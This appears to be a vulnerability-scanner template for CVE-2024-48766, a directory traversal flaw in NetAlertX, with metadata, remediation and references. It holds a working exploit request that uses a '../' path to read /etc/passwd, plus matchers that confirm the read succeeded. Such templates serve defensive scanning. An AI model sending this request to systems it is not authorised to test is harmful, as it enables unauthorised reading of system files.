漏洞描述
A directory traversal vulnerability has been identified in NetAlertX versions v24.7.18 - v24.9.12.
id: CVE-2024-48766
info:
name: NetAlert X - Arbitary File Read
author: s4e-io
severity: critical
description: |
A directory traversal vulnerability has been identified in NetAlertX versions v24.7.18 - v24.9.12.
impact: |
This vulnerability allows remote attackers to list directories on the affected system. Successful exploitation could enable unauthorized users to explore the system’s internal structure.
remediation: |
Fixed in v24.10.12
reference:
- https://advisories.checkpoint.com/defense/advisories/public/2025/cpai-2024-1358.html
- https://github.com/rapid7/metasploit-framework/pull/19881
- https://github.com/jokob-sk/NetAlertX
classification:
epss-score: 0.74577
epss-percentile: 0.98815
metadata:
verified: true
max-request: 1
vendor: jokob-sk
product: netalertx
fofa-query: "NetAlert X"
tags: cve,cve2024,netalertx,lfi,vkev
variables:
filename: "{{rand_base(6)}}"
http:
- raw:
- |
POST /php/components/logs.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
items=[{"buttons":[{"labelStringCode":"Maint_PurgeLog","event":"logManage(app.log, cleanLog)"},{"labelStringCode":"Maint_RestartServer","event":"askRestartBackend()"}],"fileName":"{{filename}}","filePath":"../../../../..//etc/passwd","textAreaCssClass":"logs"}]
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body)"
- 'contains(body, "Purge log")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100e1a12d23351fb362fd610f9bad2322f7743186aec2925220a098371077522b04022100d29154c17c1499614271f1168fdc2c4f9dd0f2f275dd6879b7ede1152bd390c4:922c64590222798bb761d5b6d8e72950